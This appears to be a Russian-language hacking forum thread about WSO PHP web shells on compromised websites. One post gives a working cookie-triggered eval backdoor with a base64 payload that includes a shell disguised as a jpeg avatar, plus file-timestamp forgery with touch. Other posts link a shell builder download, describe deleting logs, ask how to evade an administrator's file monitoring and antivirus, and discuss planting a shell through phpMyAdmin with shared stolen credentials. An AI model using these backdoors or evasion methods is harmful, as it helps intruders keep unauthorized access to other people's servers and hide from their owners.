на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа PHP: ***$logout=base64_decode($_COOKIE['logout']);***if (isset($_COOKIE['logout'])) {@die(eval($logout));} поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть Code: logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw== Вариантов много, лиж бы фантазии хватило.
Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/2012/07/builder_v1.042.zip так то любопытный конструктор
Смысл? Я им не пользуюсь. В свое время я помогал автору шела. Сейчас я помогаю по возможности другому автору другого шела. Какие есть предложения? Что именно ты хочешь сделать, какие есть замечания и самый главный вопрос чем эта версия лучше последней? А может её вообще убрать лучше? По мне так только идиот с шела будет переходить по внешним ссылкам оставляя реферер да вообще данного рода поиск не точный потому как берется полная фраза для поиска а по сути важен только год а не версия ядра с включенным именем хоста.
Сокращение от include, так обычно обзывают библиотеки с функциями или любые другие подключаемые файлы.
заметил что шеллы переодически удаляются, возможно где то спрятан скрипт который отслеживает появление новых файлов на хостинге прячу и в картинку и в txt но всё равно шелы исчезают как можно ещё спрятать ? скрипт палящий не нашёл, файлов много, сайт на битриксе wso зашифрованный, логи я удаляю после завершения входа
Я ничего не понял ты можешь выражаться ясно? ты добавил перенаправление 2>&1 для консоли или просто включил error_reporting если второе ты ты дибил однозначно
Перечень багов пожалуйста сюда списком. Не палится чем именно, список. Смысл? Я считаю это уже нужно самому проверять а не увеличивать размер шела таким бесполезным функционалом который не каждый использует. Как по мне я бы даже вырезал несколько моментов из шела за ненадобностью тем самым сократив код.
Ты внатуре даун что ли, я ему пишу выложи дифф правок или хотя бы опиши что ты сделал а он мне "скачай посмотри" что посмотреть? Ты думаешь мне интересно делать дифф старой версии шела с твоей версией чтоб посмотреть что ты там натворил? Судя по тому что ты включил вывод ошибок error_reporting ты уже показал что ты идиот который не знает что делает и зачем. По поводу перенаправления 2>&1 ясен хрен не нужно его делать, ну разве что ты хочешь упороть шелл окончательно то делай. Чтоб ты дурачек знал многие люди специально делают перенаправление буфера ошибок в /dev/null чтоб не видеть лишней инфы, а ты сейчас предлагаешь её обьеденить с буфером вывода. В общем я не буду больше ничего писать потому как с каждым твоим ответом я все больше убеждаюсь что ты очередной нарисовавшийся вася на время каникул решил тут херни натворить. И все таки не понимаю как это палился и теперь не палиться, чем ты это можешь подтвердить и как я могу это перепроверить? Не палиться что ли антивирусом clamav? Так напиши по русски или чем не палиться я понять не могу. Качать это УГ есесно не буду. В общем удачи, я смотрю критику ты не воспринимаешь и явных овтетов не даешь, все упирается в "скачай посмотри"
админ хитрый, мониторит файлы на наличие новых файлов на сервере + предыдущий файл снёс и запретил входить в админку всем подрят но есть доступ к базе через phpmyadmin войти в админку сайта не получается - стоит блок - разрешает определённым ip или юзерагентам (bitrix) можно ли через phpmyadmin залить шелл ? что то пробовал как по этому видео но мини шелл не работает - не выводит phpinfo скину в лс логин/pass от sql, помогите пожалуйста
на хостинге не пошло Forbidden: a malicious file has been detected. Detected as: PHP.Shell-38 печалька
Базу вы "сим превосходным инструментом" ни как не взломаете, если только имеете логин, пароль, удаленый хост и название БД!
